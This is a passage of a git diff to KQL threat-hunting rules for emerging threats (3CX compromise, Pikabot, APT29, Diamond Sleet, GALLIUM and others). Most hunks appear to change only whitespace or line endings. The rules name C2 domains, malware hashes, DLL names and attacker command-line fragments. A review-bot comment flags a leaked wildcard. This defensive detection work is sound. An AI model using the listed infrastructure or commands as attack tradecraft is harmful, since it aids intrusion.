 | where (RemoteUrl contains "akamaicontainer.com" or RemoteUrl contains "akamaitechcloudservices.com" or RemoteUrl contains "azuredeploystore.com" or RemoteUrl contains "azureonlinecloud.com" or RemoteUrl contains "azureonlinestorage.com" or RemoteUrl contains "dunamistrd.com" or RemoteUrl contains "glcloudservice.com" or RemoteUrl contains "journalide.org" or RemoteUrl contains "msedgepackageinfo.com" or RemoteUrl contains "msstorageazure.com" or RemoteUrl contains "msstorageboxes.com" or RemoteUrl contains "officeaddons.com" or RemoteUrl contains "officestoragebox.com" or RemoteUrl contains "pbxcloudeservices.com" or RemoteUrl contains "pbxphonenetwork.com" or RemoteUrl contains "pbxsources.com" or RemoteUrl contains "qwepoi123098.com" or RemoteUrl contains "sbmsa.wiki" or RemoteUrl contains "sourceslabs.com" or RemoteUrl contains "visualstudiofactory.com" or RemoteUrl contains "zacharryblogs.com") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql
index 2fdaa157..ac7eaece 100644
--- a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql
+++ b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql
@@ -1,10 +1,10 @@
-// Title: Potential CSharp Streamer RAT Loading .NET Executable Image
-// Author: Luca Di Bartolomeo
-// Date: 2024-06-22
-// Level: high
-// Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002, detection.emerging-threats
-
-DeviceImageLoadEvents
+// Title: Potential CSharp Streamer RAT Loading .NET Executable Image
+// Author: Luca Di Bartolomeo
+// Date: 2024-06-22
+// Level: high
+// Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002, detection.emerging-threats
+
+DeviceImageLoadEvents
 | where FolderPath matches regex "\\\\AppData\\\\Local\\\\Temp\\\\dat[0-9A-Z]{4}\\.tmp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
index b15a1eeb..da63671e 100644
--- a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql
+++ b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql 
@@ -1,12 +1,12 @@
-// Title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-06-13
-// Level: high
-// Description: Detects potential exploitation of remote code execution vulnerability CVE-2025-33053
-// by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from
-// attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1105, detection.emerging-threats, cve.2025-33053
-
-DeviceImageLoadEvents
+// Title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-13
+// Level: high
+// Description: Detects potential exploitation of remote code execution vulnerability CVE-2025-33053
+// by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from
+// attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1105, detection.emerging-threats, cve.2025-33053
+
+DeviceImageLoadEvents
 | where (InitiatingProcessFolderPath endswith "\\route.exe" or InitiatingProcessFolderPath endswith "\\netsh.exe" or InitiatingProcessFolderPath endswith "\\makecab.exe" or InitiatingProcessFolderPath endswith "\\dxdiag.exe" or InitiatingProcessFolderPath endswith "\\ipconfig.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and (InitiatingProcessFolderPath contains "\\DavWWWRoot\\" and InitiatingProcessFolderPath startswith "\\\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql
index d3f51ba4..eb026653 100644
--- a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql
+++ b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql
@@ -1,13 +1,13 @@
-// Title: Potential Pikabot C2 Activity
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2023-10-27
-// Level: high
-// Description: Detects the execution of rundll32 that leads to an external network connection.
-// The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1573, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceNetworkEvents
+// Title: Potential Pikabot C2 Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects the execution of rundll32 that leads to an external network connection.
+// The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1573, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
 | where (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\sndvol.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wwahost.exe") and InitiatingProcessParentFileName =~ "rundll32.exe" and Protocol =~ "tcp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql b/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql
index 2f1ab35c..29aeaaab 100644
--- a/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql
+++ b/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql
@@ -1,10 +1,10 @@
-// Title: Potential Suspicious Child Process Of 3CXDesktopApp
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-29
-// Level: high
-// Description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Suspicious Child Process Of 3CXDesktopApp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, detection.emerging-threats
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql b/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql
index e22882e2..2016ec13 100644
--- a/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql
+++ b/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql
@@ -1,10 +1,10 @@
-// Title: GALLIUM IOCs
-// Author: Tim Burrell
-// Date: 2020-02-07
-// Level: high
-// Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.command-and-control, attack.t1212, attack.t1071, attack.g0093, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: GALLIUM IOCs
+// Author: Tim Burrell
+// Date: 2020-02-07
+// Level: high
+// Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.command-and-control, attack.t1212, attack.t1071, attack.g0093, detection.emerging-threats
+
+DeviceProcessEvents
 | where (SHA256 startswith "9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd" or SHA256 startswith "7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b" or SHA256 startswith "657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5" or SHA256 startswith "2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29" or SHA256 startswith "52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77" or SHA256 startswith "a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3" or SHA256 startswith "5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022" or SHA256 startswith "6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883" or SHA256 startswith "3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e" or SHA256 startswith "1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7" or SHA256 startswith "fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1" or SHA256 startswith "7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c" or SHA256 startswith 
"178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945" or SHA256 startswith "51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9" or SHA256 startswith "889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79" or SHA256 startswith "332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf" or SHA256 startswith "44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08" or SHA256 startswith "63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef" or SHA256 startswith "056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070") or (SHA1 startswith "53a44c2396d15c3a03723fa5e5db54cafd527635" or SHA1 startswith "9c5e496921e3bc882dc40694f1dcc3746a75db19" or SHA1 startswith "aeb573accfd95758550cf30bf04f389a92922844" or SHA1 startswith "79ef78a797403a4ed1a616c68e07fff868a8650a" or SHA1 startswith "4f6f38b4cec35e895d91c052b1f5a83d665c2196" or SHA1 startswith "1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d" or SHA1 startswith "e841a63e47361a572db9a7334af459ddca11347a" or SHA1 startswith "c28f606df28a9bc8df75a4d5e5837fc5522dd34d" or SHA1 startswith "2e94b305d6812a9f96e6781c888e48c7fb157b6b" or SHA1 startswith "dd44133716b8a241957b912fa6a02efde3ce3025" or SHA1 startswith "8793bf166cb89eb55f0593404e4e933ab605e803" or SHA1 startswith "a39b57032dbb2335499a51e13470a7cd5d86b138" or SHA1 startswith "41cc2b15c662bc001c0eb92f6cc222934f0beeea" or SHA1 startswith "d209430d6af54792371174e70e27dd11d3def7a7" or SHA1 startswith "1c6452026c56efd2c94cea7e0f671eb55515edb0" or SHA1 startswith "c6b41d3afdcdcaf9f442bbe772f5da871801fd5a" or SHA1 startswith "4923d460e22fbbf165bbbaba168e5a46b8157d9f" or SHA1 startswith "f201504bd96e81d0d350c3a8332593ee1c9e09de" or SHA1 startswith "ddd2db1127632a2a52943a2fe516a2e7d05d70d2")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql b/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql
index 5e586028..047815fc 100644
--- a/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql
+++ b/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential Russian APT Credential Theft Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-02-21
-// Level: critical
-// Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.001, attack.t1003.003, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Russian APT Credential Theft Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-21
+// Level: critical
+// Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, attack.t1003.003, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "adexplorer -snapshot \"\" c:\\users\\" and ProcessCommandLine contains "\\downloads\\" and ProcessCommandLine contains ".snp") or (ProcessCommandLine contains "xcopy /S /E /C /Q /H \\\\" and ProcessCommandLine contains "\\sysvol\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
index 83b98d03..1e7d290c 100644
--- a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
+++ b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql
@@ -1,14 +1,14 @@
-// Title: Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit
-// Author: Gene Kazimiarovich
-// Date: 2025-04-20
-// Level: medium
-// Description: Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction.
-// If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker.
-// MITRE Tactic: Credential Access
-// Tags: detection.emerging-threats, attack.credential-access, attack.t1187, cve.2025-24054
-// False Positives:
-// - Legitimate Library shortcuts under %APPDATA%\Microsoft\Windows\Libraries\ (rarely created by end-users)
-// - Custom corporate scripts that programmatically generate .library-ms Files
-
-DeviceFileEvents
+// Title: Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit
+// Author: Gene Kazimiarovich
+// Date: 2025-04-20
+// Level: medium
+// Description: Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction.
+// If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker.
+// MITRE Tactic: Credential Access
+// Tags: detection.emerging-threats, attack.credential-access, attack.t1187, cve.2025-24054
+// False Positives:
+// - Legitimate Library shortcuts under %APPDATA%\Microsoft\Windows\Libraries\ (rarely created by end-users)
+// - Custom corporate scripts that programmatically generate .library-ms Files
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\7z.exe" or InitiatingProcessFolderPath endswith "\\winrar.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and FolderPath endswith ".library-ms"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql
index d120fd91..19465ea3 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql
@@ -1,12 +1,12 @@
-// Title: APT29 2018 Phishing Campaign CommandLine Indicators
-// Author: Florian Roth (Nextron Systems), @41thexplorer
-// Date: 2018-11-20
-// Level: critical
-// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: APT29 2018 Phishing Campaign CommandLine Indicators
+// Author: Florian Roth (Nextron Systems), @41thexplorer
+// Date: 2018-11-20
+// Level: critical
+// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-noni -ep bypass $" or (ProcessCommandLine contains "cyzfc.dat," and ProcessCommandLine contains "PointFunctionCall")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql
index c6dc5a5b..8f93e799 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql
@@ -1,12 +1,12 @@
-// Title: APT29 2018 Phishing Campaign File Indicators
-// Author: @41thexplorer
-// Date: 2018-11-20
-// Level: critical
-// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: APT29 2018 Phishing Campaign File Indicators
+// Author: @41thexplorer
+// Date: 2018-11-20
+// Level: critical
+// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath contains "ds7002.lnk" or FolderPath contains "ds7002.pdf" or FolderPath contains "ds7002.zip"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql b/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql
index dc1d9e6f..18e571bf 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql
@@ -1,12 +1,12 @@
-// Title: APT PRIVATELOG Image Load Pattern
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-09-07
-// Level: high
-// Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, detection.emerging-threats
-// False Positives:
-// - Rarely observed
-
-DeviceImageLoadEvents
+// Title: APT PRIVATELOG Image Load Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-09-07
+// Level: high
+// Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, detection.emerging-threats
+// False Positives:
+// - Rarely observed
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\clfsw32.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql b/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql
index f34a9bcb..44aba9ba 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql
@@ -1,10 +1,10 @@
-// Title: Blue Mockingbird - Registry
-// Author: Trent Liffick (@tliffick)
-// Date: 2020-05-14
-// Level: high
-// Description: Attempts to detect system changes made by Blue Mockingbird
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.t1112, attack.t1047, detection.emerging-threats
-
-DeviceRegistryEvents
+// Title: Blue Mockingbird - Registry
+// Author: Trent Liffick (@tliffick)
+// Date: 2020-05-14
+// Level: high
+// Description: Attempts to detect system changes made by Blue Mockingbird
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.t1112, attack.t1047, detection.emerging-threats
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql
index abe0487c..8a21aa8a 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql
@@ -1,12 +1,12 @@
-// Title: Diamond Sleet APT DLL Sideloading Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-10-24
-// Level: high
-// Description: Detects DLL sideloading activity seen used by Diamond Sleet APT
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Diamond Sleet APT DLL Sideloading Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects DLL sideloading activity seen used by Diamond Sleet APT
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where (FolderPath endswith ":\\ProgramData\\Version.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\clip.exe") or (FolderPath endswith ":\\ProgramData\\DSROLE.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\wsmprovhost.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql
index 9993a698..0692f2c2 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql
@@ -1,10 +1,10 @@
-// Title: Diamond Sleet APT Scheduled Task Creation - Registry
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-10-24
-// Level: high
-// Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562, detection.emerging-threats
-
-DeviceRegistryEvents
+// Title: Diamond Sleet APT Scheduled Task Creation - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562, detection.emerging-threats
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Windows TeamCity Settings User Interface"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql b/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
index 7c11ad3e..3df96209 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
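Review bot: The new-side predicate `RegistryKey endswith "...\\TaskCache\\Tree*"` carries a literal asterisk, so it only matches keys whose last character is `*` and the rule can never fire; the `*` looks like a Sigma wildcard that survived conversion. A substring match expresses the intent, e.g. `| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\" and RegistryKey contains "Windows TeamCity Settings User Interface"`. The same leaked wildcard appears in the FlowCloud Registry Markers hunk, where `RegistryKey endswith "\\SYSTEM\\Setup\\PrintResponsor*"` should become `RegistryKey contains "\\SYSTEM\\Setup\\PrintResponsor"`.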
@@ -1,10 +1,10 @@
-// Title: DLL Names Used By SVR For GraphicalProton Backdoor
-// Author: CISA
-// Date: 2023-12-18
-// Level: medium
-// Description: Hunts known SVR-specific DLL names.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats
-
-DeviceImageLoadEvents
+// Title: DLL Names Used By SVR For GraphicalProton Backdoor
+// Author: CISA
+// Date: 2023-12-18
+// Level: medium
+// Description: Hunts known SVR-specific DLL names.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\AclNumsInvertHost.dll" or FolderPath endswith "\\AddressResourcesSpec.dll" or FolderPath endswith "\\BlendMonitorStringBuild.dll" or FolderPath endswith "\\ChildPaletteConnected.dll" or FolderPath endswith "\\DeregisterSeekUsers.dll" or FolderPath endswith "\\HandleFrequencyAll.dll" or FolderPath endswith "\\HardSwapColor.dll" or FolderPath endswith "\\LengthInMemoryActivate.dll" or FolderPath endswith "\\ModeBitmapNumericAnimate.dll" or FolderPath endswith "\\ModeFolderSignMove.dll" or FolderPath endswith "\\ParametersNamesPopup.dll" or FolderPath endswith "\\PerformanceCaptionApi.dll" or FolderPath endswith "\\ScrollbarHandleGet.dll" or FolderPath endswith "\\UnregisterAncestorAppendAuto.dll" or FolderPath endswith "\\WowIcmpRemoveReg.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql b/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql
index df167168..89bb9933 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql
@@ -1,12 +1,12 @@
-// Title: Equation Group DLL_U Export Function Load
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-03-04
-// Level: critical
-// Description: Detects a specific export function name used by one of EquationGroup tools
-// MITRE Tactic: Defense Evasion
-// Tags: attack.g0020, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Equation Group DLL_U Export Function Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-03-04
+// Level: critical
+// Description: Detects a specific export function name used by one of EquationGroup tools
+// MITRE Tactic: Defense Evasion
+// Tags: attack.g0020, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-export dll_u" or (ProcessCommandLine endswith ",dll_u" or ProcessCommandLine endswith " dll_u")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql b/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql
index cd9f3032..6799014d 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql
@@ -1,10 +1,10 @@
-// Title: EvilNum APT Golden Chickens Deployment Via OCX Files
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-07-10
-// Level: critical
-// Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: EvilNum APT Golden Chickens Deployment Via OCX Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-10
+// Level: critical
+// Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
